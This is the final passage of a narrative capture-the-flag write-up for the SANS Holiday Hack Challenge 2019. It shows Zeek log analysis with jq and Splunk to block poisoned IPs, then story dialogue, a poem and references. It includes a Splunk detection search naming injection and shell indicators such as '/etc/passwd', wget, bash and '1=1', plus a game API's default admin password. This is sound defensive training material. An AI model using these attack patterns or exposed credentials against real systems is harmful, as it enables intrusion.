Challenge Objective:  Identify the destination IP address with the longest connection duration using the supplied Zeek logfile.

Terminal Start:

For this I need to parse conn.log with JQuery to find the longest duration connection [57].  I can do that with cat conn.log | jq -s -c 'sort_by(.duration) | reverse [:2]' to show the top 2 longest durations and we see the IP is 13.107.21.200. 

Enter 13.107.21.200 into runtoanswer and

 

Achievement Unlocked: Zeek JSON Analysis - You have completed the Zeek JSON Analysis challenge!

       So, this new elf is Wunorse Openslae.  As I hand him back his terminal, he exclaims, “That’s got to be the one - thanks! Hey, you know what? We’ve got a crisis here. You see, Santa’s flight route is planned by a complex set of machine learning algorithms which use available weather data. All the weather stations are reporting severe weather to Santa’s Sleigh. I think someone might be forging intentionally false weather data! I’m so flummoxed I can’t even remember how to login! Hmm… Maybe the Zeek http.log could help us. I worry about LFI [58], XSS [59], and SQLi [44] in the Zeek log - oh my! And I’d be shocked if there weren’t some shell stuff in there too [60]. I’ll bet if you pick through, you can find some naughty data from naughty hosts and block it in the firewall. If you find a log entry that definitely looks bad, try pivoting off other unusual attributes in that entry to find more bad IPs. The sleigh’s machine learning device (SRF) needs most of the malicious IPs blocked in order to calculate a good route. Try not to block many legitimate weather station IPs as that could also cause route calculation failure. Remember, when looking at JSON data, jq is the tool for you!”

              

       I confidently walk up to the Tooth Fairy.  “I’m the Tooth Fairy, the mastermind behind the plot to destroy the holiday season.  I hate how Santa is so beloved, but only works one day per year!  He has all of the resources of the North Pole and the elves to help him too.  I run a solo operation, toiling year-round collecting deciduous bicuspids and more from children.  But I get nowhere near the gratitude that Santa gets. He needs to share his holiday resources with the rest of us!  But, although you found me, you haven’t foiled my plot! Santa’s sleigh will NOT be able to find its way.  I will get my revenge and respect! I want my own holiday, National Tooth Fairy Day, to be the most popular holiday on the calendar!!!” the Tooth Fairy shouts staring angrily.  I know the only thing that I can do is find those poisoned weather IPs and block Santa’s Route Finder from getting their bad information.  I have to save Christmas.

 

       I start by uploading the http log file to Splunk.  After all, Splunk did sponsor this Christmas story.  They should have a hand in stopping the Tooth Fairy nefarious plot.  Once uploaded to Splunk, my first search is for the Readme file that the cleartext document from Chapter 10 told me about. Sure enough, there’s the admin password to the API.              

 

 

# Sled-O-Matic - Sleigh Route Finder Web API

### Installation

```

sudo apt install python3-pip

sudo python3 -m pip install -r requirements.txt

```

#### Running:

`python3 ./srfweb.py`

#### Logging in:

You can login using the default admin pass:

`admin 924158F9522B3744F5FCD4D10FAC4356`

 

Next, I look for any instance of Local File Inclusion, Cross-Site Scripting, SQL Injection, or Shellshock attempts using this search string:

 

host="srf.elfu.org" passwd OR sh OR cmd OR "*%00*" OR javascript:alert OR ../ OR "1=1" OR rb OR perl OR chmod OR SELECT OR UNION OR cat OR ls OR cd OR WHERE OR bash OR etc OR NULL OR cgi-bin OR python OR wget OR script  

 

       That yielded 597 results.  I am sure a good many of those are false positives so let’s begin by exporting those to CSV and pulling out the obvious attempts, the ../ the =/etc/passwd, the username ‘ OR 1=1, etc. Doing that I am able to narrow it down to 88 obvious attacks (D2). Off of these events, I noticed several unusual User-Agent Strings.  So, I searched all events based on those 61 unique User-Agent strings.  That produced 176 events, but I noticed the OBVIOUS attacks all had only two events per string.  That led me to believe that there were some false positives in this list.  So, I pulled out 109 obvious attack events.  There were 95 unique IP addresses in those 109 events. I submitted those 95 IP addresses to DENY and received a successful RID (D3, D4, D5).      

Smiling, I turned to the Tooth Fairy.  “Not today. Santa will arrive quite safely.  All your planning and scheming has been fruitless.  You should turn your anger to more productive pursuits” and I enter the RID value into the KringleCon console. 

 

Achievement Unlocked: Filter Out Poisoned Sources of Weather Data - Congratulations! You have completed the Filter Out Poisoned Sources of Weather Data challenge! 

 

I turn around and stride towards the now open Bell Tower door. 

 

 

Bell Tower

              

Upon reaching the top of the Bell Tower, I am greeted by Santa, Krampus, and the Tooth Fairy, looking none too happy.  I greet Krampus first. “Hey there Krampus!”

 

“Congratulations on a job well done! Oh, by the way, I won the Frido Sleigh contest. I got 31.8% of the prizes, though I’ll have to figure that out. …,” he replied. 

 

“Yeah, you work on that buddy,” turning to the Tooth Fairy, “I’ll never really understand why you did it, but you’ll have a while to think about it.”

 

“You foiled my dastardly plan! I’m ruined! And I would have gotten away with it too, if it weren’t for you meddling kids!” she shrieked. 

 

“Yeah yeah and my little dog too.  I know.  Well, big guy.  Thanks for inviting me.” I laugh turning to Santa. 

 

He beams with pride, “You did it! Thank you! You uncovered the sinister plot to destroy the holiday season! Through your diligent efforts, we’ve brought the Tooth Fairy to justice and saved the holidays! Ho Ho Ho! The more I laugh, the more I fill with glee. And the more the glee, The more I’m a merrier me! Merry Christmas and Happy Holidays.”

 

Achievement Unlocked: You Won! - Through your diligent efforts, you brought the Tooth Fairy to justice and saved the holidays! Congratulations!  

 

After the credits roll, I turn to head back towards the train stain when a strange object catches my eye.  Over Krampus’ left shoulder, I see a note. 

Oh, no!  Jack Frost!  I’ll have to keep an eye on things around here, but until then,

 

Merry Christmas To All & To All A Good Night!

 

The End
Narrative

Whose grounds these are, I think I know

His home is in the North Pole though

He will not mind me traipsing here

To watch his students learn and grow

Some other folk might stop and sneer

"Two turtle doves, this man did rear?"

I'll find the birds, come push or shove

Objectives given: I'll soon clear

Upon discov'ring each white dove,

The subject of much campus love,

I find the challenges are more

Than one can count on woolen glove.

Who wandered thus through closet door?

Ho ho, what's this? What strange boudoir!

Things here cannot be what they seem

That portal's more than clothing store.

Who enters contests by the ream

And lives in tunnels meant for steam?

This Krampus bloke seems rather strange

And yet I must now join his team...

Despite this fellow's funk and mange

My fate, I think, he's bound to change.

What is this contest all about?

His victory I shall arrange!

To arms, my friends! Do scream and shout!

Some villain targets Santa's route!

What scum - what filth would seek to end

Kris Kringle's journey while he's out?

Surprised, I am, but "shock" may tend

To overstate and condescend.

'Tis little more than plot reveal

That fairies often do extend

And yet, despite her jealous zeal,

My skills did win, my hacking heal!

No dental dealer can so keep

Our red-clad hero in ordeal!

This Christmas must now fall asleep,

But next year comes, and troubles creep.

And Jack Frost hasn't made a peep,

And Jack Frost hasn't made a peep...

References

4) Statement from Google Booth at Student Union - “Google is a proud sponsor of KringleCon and the Holiday Hack Challenge. We wish you a happy holiday hacking season.”

5) Statement from SANS booth at Student Union - “Happy holidays from the best college in cybersecurity. Brilliant minds like yours belong at SANS.edu.”

6) Statement from Splunk booth at Student Union - “Splunk is proud to be a contributor to KringleCon and the Holiday Hack Challenge. Happy holidays from the Splunk security team!”

7) Statement from Swag Booth at Student Union with link to https://teespring.com/stores/kringlecon-swag  - “Want some KringleCon swag?  Profit? No, we don't make anything on swag sales.  We make our money from the cheer-powered crypto miners.”

 

  1. How to configure iptables on CentOS - https://upcloud.com/community/tutorials/configure-iptables-centos/
  2. Chrome Dev Tools - https://developers.google.com/web/tools/chrome-devtools
  3. Firefox Developer Tools - https://developer.mozilla.org/en-US/docs/Tools
  4. Safari Dev Tools - https://developer.apple.com/safari/tools/
  5. Edge Dev Tools - https://docs.microsoft.com/en-us/microsoft-edge/devtools-guide/console
  6. Curl man page - https://curl.haxx.se/docs/manpage.html
  7. Lynx Dev Tools - https://xkcd.com/325/
  8. Hint from SugarPlum Mary - “Linux Path - Green words matter, files must be found, and the terminal's $PATH matters.”
  9. Shell is Only the Beginning – Carlos Perez - https://www.darkoperator.com/blog/2014/8/8/sysinternals-sysmon
  10. Endgame Experts - Ross Wolf - https://www.endgame.com/our-experts/ross-wolf
  11. EQL Threat Hunting – Joshua Wright - https://pen-testing.sans.org/blog/2019/12/10/eql-threat-hunting/
  12. Hint from Alabaster Snowball - sudo -l says I can run a command as root. What does it do?
  13. Hint from Alabaster Snowball - On Linux, a user's shell is determined by the contents of /etc/passwd
  14. Machine Learning Use Cases for Cybersecurity – Chris Davis - https://www.youtube.com/watch?v=jmVPLwjm_zs&feature=youtu.be
  15. MongoDB Documentation - https://docs.mongodb.com/manual/reference/command/listDatabases/#dbcmd.listDatabases
  16. Reversing Crypto the Easy Way – Ron Bowes - https://www.youtube.com/watch?v=obJdpKDpFBA&feature=youtu.be
  17. SANS PowerShell Cheat Sheet - https://blogs.sans.org/pen-testing/files/2016/05/PowerShellCheatSheet_v41.pdf
  18. Online CSV to Table Converter - https://www.becsv.com/csv-table.php
  19. RITA - https://www.activecountermeasures.com/free-tools/rita/
  20. Welcome to KringleCon 2 – Ed Skoudis - http://www.youtube.com/watch?v=iUF5pBv7ukM
  21. Keynote: A Hunting We Must Go – John Strand - http://www.youtube.com/watch?v=jxOZ5u2CYWw
  22. How to (Holiday) Hack It: Tips for Crushing CTFS & Pwning Pentests – Katie Knowles - http://www.youtube.com/watch?v=c02mH7F1xvU
  23. Santa’s Naughty List: Holiday Themed Social Engineering – Snow - http://www.youtube.com/watch?v=HKLSmbOXJRU
  24. Dashing Through the Logs – James Brodsky - http://www.youtube.com/watch?v=qbIhHhRKQCw
  25. Web Apps: A Trailhead - Chris Elgee - http://www.youtube.com/watch?v=0T6-DQtzCgM
  26. Learning to Escape Containers – Ian Coldwater - http://www.youtube.com/watch?v=S3gfEDEB_l0
  27. Optical Decoding of Keys – Deviant Ollam - http://www.youtube.com/watch?v=KU6FJnbkeLA
  28. Logs? Where we’re going we don’t need logs. – Mark Baggett - http://www.youtube.com/watch?v=Dx78oObfiBM
  29. Telling Stories from the North Pole – Dave Kennedy - http://www.youtube.com/watch?v=9QuOhRGvryc
  30. 5 Steps to Build and Lead a Team of Holly Jolly Hackers – John Hammond - http://www.youtube.com/watch?v=D5Nwg84cV1E
  31. Over 90,000: Ups and Downs of my InfoSec Twitter Journey – Lesley Carhart - http://www.youtube.com/watch?v=RplOa_lqXvk
  32. When Malware Goes Mobile, Quick Detection is Critical – Heather Mahalik - http://www.youtube.com/watch?v=IEbLOvT4Fts
  33. Objective 3 Log Files - https://downloads.elfu.org/Security.evtx.zip
  34. Objective 4 JSON Files - https://downloads.elfu.org/sysmon-data.json.zip
  35. Objective 5 ZEEK Files - https://downloads.elfu.org/elfu-zeeklogs.zip
  36. Graylog Searching Query Language - http://docs.graylog.org/en/3.1/pages/queries.html
  37. SQL Injection from OWASP - https://www.owasp.org/index.php/SQL_Injection
  38. SQLMAP Tamper Scripts for The Win - https://pen-testing.sans.org/blog/2017/10/13/sqlmap-tamper-scripts-for-the-win
  39. Key and Lock Decoding Tools - https://github.com/deviantollam/decoding
  40. Frido Sleigh Contest - https://fridosleigh.com/
  41. Objective 8 Image Catalog - https://downloads.elfu.org/capteha_images.tar.gz
  42. Objective 8 API Interface Wrapper - https://downloads.elfu.org/capteha_api.py
  43. FloydHub Project - https://www.floydhub.com/cruggieri114/projects/tf-sans
  44. Tensorflow Training Code - https://github.com/chrisjd20/img_rec_tf_ml_demo
  45. Student Portal Server - https://studentportal.elfu.org/
  46. Epoch Converter - https://www.epochconverter.com/
  47. Crate - https://crate.elfu.org/ and http://sleighworkshopdoor.elfu.org
  48. Zeek JSON Logs - https://downloads.elfu.org/http.log.gz
  49. Sleigh Route Finder - srf.elfu.org
  50. Parsing Zeek JSON Logs with JQ - https://pen-testing.sans.org/blog/2019/12/03/parsing-zeek-json-logs-with-jq-2
  51. Testing for Local File Inclusion - https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion
  52. Cross-site Scripting (XSS) - https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
  53. Shellshock (software bug) -  https://en.wikipedia.org/wiki/Shellshock_(software_bug)

D1. Pepper Minstix Graylog Incident Report -

D2. Initial Starting Point CSV -

D3. User-Agent String List -

D4. User-Agent Filtered CSV -

D5. Objective 12 IP list -

C1. Modified API Wrapper in txt format -

C2. Classifier python script in txt format -

C3. Decryptor script in txt format -